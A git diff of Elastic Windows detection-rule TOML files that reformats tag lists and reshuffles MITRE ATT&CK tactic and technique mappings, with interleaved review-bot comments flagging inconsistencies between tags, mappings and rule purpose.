+[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index c14b3d977e2..1e01769894a 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml 
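Review bot: The tags hunk replaces `"Tactic: Initial Access"` with `"Tactic: Execution"`, but the threat hunk below keeps a `[rule.threat.tactic]` entry with `id = "TA0001"` Initial Access next to the new `TA0002` Execution entry, so the tag list no longer reflects the rule's own mapping. The same mismatch appears in the next file (`execution_downloaded_url_file.toml`: tags carry only Execution while `TA0001` remains), in `execution_enumeration_via_wmiprvse.toml` (tags drop Discovery while `TA0007` remains), in `execution_html_help_executable_program_connecting_to_the_internet.toml` (tags drop Defense Evasion while `TA0005` remains) and in `execution_mofcomp.toml` (tags drop Persistence while `TA0003` remains). Either keep one `Tactic:` tag per tactic in `rule.threat`, for example adding `"Tactic: Initial Access",` after the Execution tag here, or remove the corresponding threat entries; one or the other must change in each of those files.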
@@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/11" [rule] author = ["Elastic"] @@ -18,7 +18,14 @@ name = "Downloaded URL Files" risk_score = 47 rule_id = "cd82e3d6-1346-4afd-8f22-38388bbf34cb" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" @@ -65,13 +72,36 @@ URL shortcut files, typically used for quick access to web resources, can be exp [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml index cbb812845f3..15f89225424 100644 --- a/rules/windows/execution_enumeration_via_wmiprvse.toml +++ b/rules/windows/execution_enumeration_via_wmiprvse.toml 
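Review bot: The rewritten `tags` array in this file ends with `"Resources: Investigation Guide"` and no trailing comma, while every other multi-line `tags` array in this chunk ends with `"Resources: Investigation Guide",`; since these arrays appear to be emitted by the same tool, the odd one out suggests a manual edit or a formatter inconsistency. Add the trailing comma so the file matches its siblings and future diffs stay one-line.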
@@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ Windows Management Instrumentation (WMI) is a powerful framework for managing da risk_score = 21 rule_id = "770e0c4d-b998-41e5-a62e-c7901fd7f470" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -86,51 +99,51 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" 
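Review bot: `T1033` System Owner/User Discovery and `T1082` System Information Discovery are removed from the Discovery entry while `T1016.001` and `T1518` are added; the command list the rule matches is outside the hunk, so this may be correct, but whoami- and systeminfo-style children of WmiPrvSE are the classic enumerations a rule with this name catches. Please confirm against the query before dropping those two techniques, since they are what analysts use to attribute the alert in ATT&CK coverage views.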
diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index 82a8d3aa8d2..2b11f8ec924 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [transform] [[transform.osquery]] 
@@ -236,66 +236,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.009" -name = "Regsvcs/Regasm" -reference = "https://attack.mitre.org/techniques/T1218/009/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] 
-framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 2a1c60b804f..62b894c0d72 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -113,7 +113,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "b29ee2be-bf99-446c-ab1a-2dc0183394b8" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", +] type = "eql" query = ''' 
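Review bot: The `@@ -236,66 +236,36 @@` hunk spanning the previous line removes the whole `T1218` System Binary Proxy Execution family (CMSTP, InstallUtil, Mshta, Regsvcs/Regasm, Regsvr32, Rundll32) from the Defense Evasion entry and keeps only `T1036.005`, for a rule whose file name is about execution from an unusual path via the command line. The query is outside the hunk, so if it still matches those LOLBins the mapping now under-reports what the rule detects. Either restore the `T1218` technique with its sub-technique tables or state in the commit why the proxy-execution coverage was dropped.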
@@ -131,36 +140,36 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml index 9b47d891bbf..1724e0f677c 100644 --- a/rules/windows/execution_initial_access_foxmail_exploit.toml +++ b/rules/windows/execution_initial_access_foxmail_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -90,31 +90,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml index 580c7458cb8..b0fc6db6048 100644 --- a/rules/windows/execution_initial_access_via_msc_file.toml +++ b/rules/windows/execution_initial_access_via_msc_file.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
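Review bot: The Initial Access entry swaps `T1566`/`T1566.001` Spearphishing Attachment for `T1189` Drive-by Compromise, but `T1189` describes delivery through a browser visiting a compromised or malicious site, while a Foxmail exploit rule (per the file name) is triggered by a crafted message reaching an email client, which is the spearphishing case. The same substitution appears in the `execution_initial_access_wps_dll_exploit.toml` hunk further down, where `T1129` Shared Modules is also dropped. Unless the queries now key on browser activity, keep `T1566.001` here and confirm the WPS mapping as well.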
@@ -50,7 +50,19 @@ references = ["https://www.genians.co.kr/blog/threat_intelligence/facebook"] risk_score = 73 rule_id = "e760c72b-bb1f-44f0-9f0d-37d51744ee75" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" 
@@ -88,36 +100,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.014" -name = "MMC" -reference = "https://attack.mitre.org/techniques/T1218/014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml index d318934d34c..b6d8c918d59 100644 --- a/rules/windows/execution_initial_access_wps_dll_exploit.toml +++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml 
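Review bot: The entire Defense Evasion entry with `T1218.014` MMC is deleted and an Initial Access entry with `T1566.001`/`T1566.002` is added in its place, and the tags hunk above mirrors that by dropping `"Tactic: Defense Evasion"`. MMC proxy execution is the mechanism a malicious `.msc` file abuses, so removing it leaves the rule mapped only to the delivery side; adding Initial Access is reasonable, but it should not come at the cost of the technique that names what the query detects. Keep the `T1218`/`T1218.014` entry alongside the new one unless the query (outside the hunk) no longer matches mmc.exe.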
@@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,7 +57,16 @@ references = [ risk_score = 73 rule_id = "ac6bc744-e82b-41ad-b58d-90654fa4ebfb" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,18 +88,26 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_mofcomp.toml b/rules/windows/execution_mofcomp.toml index 1b244d6b497..a20ec6e9ab6 100644 --- a/rules/windows/execution_mofcomp.toml +++ b/rules/windows/execution_mofcomp.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/21" [rule] author = ["Elastic"] @@ -25,7 +25,18 @@ name = "Mofcomp Activity" risk_score = 21 rule_id = "210d4430-b371-470e-b879-80b7182aa75e" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +90,31 @@ Mofcomp.exe is a tool used to compile Managed Object Format (MOF) files, which d [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + 
diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 6f016f0f871..979a2d927a3 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/08/06" [rule] author = ["Elastic"] @@ -99,22 +99,30 @@ sequence with maxspan=2h [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 25521e39cf8..8e6c5f0f7eb 100644 --- a/rules/windows/execution_posh_hacktool_functions.toml +++ b/rules/windows/execution_posh_hacktool_functions.toml 
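Review bot: The new first `[[rule.threat]]` entry in `execution_ms_office_written_file.toml` has `framework = "MITRE ATT&CK"` followed directly by `[rule.threat.tactic]` with `id = "TA0002"`, so it carries a tactic with no `[[rule.threat.technique]]` at all after `T1203` and `T1204.002` are removed. A tactic-only entry contributes nothing to technique coverage and will show as an unmapped Execution tactic in navigator exports. Either restore `T1204`/`T1204.002` Malicious File under it, which is what an Office-written-file execution rule detects, or drop the empty entry and the corresponding `Tactic: Execution` tag.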
@@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -102,7 +102,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -303,111 +310,22 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" - -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" - -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = 
"T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index a2bbc3e2a74..2053274cec8 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
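Review bot: The `@@ -303,111 +310,22 @@` hunk starting on the previous line strips five tactics (Credential Access with `T1003`/`T1558.003`, Defense Evasion with `T1055`, Discovery with `T1069.002`/`T1087.002`, Exfiltration with `T1567`, Lateral Movement with `T1021`) and leaves only Execution with `T1059.001`, matching the tags hunk above that reduces the list to `"Tactic: Execution"`. For a rule that alerts on named offensive PowerShell functions spanning exactly those categories, the removed mappings are what lets an analyst tell a Kerberoasting hit from an injection hit in coverage views, and nothing in the hunk suggests the function list (outside the hunk) shrank. If the intent is one tactic per rule, say so in the commit; otherwise keep the per-category entries.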
@@ -118,34 +118,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index aae57571bac..f5e2c08a17b 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] 
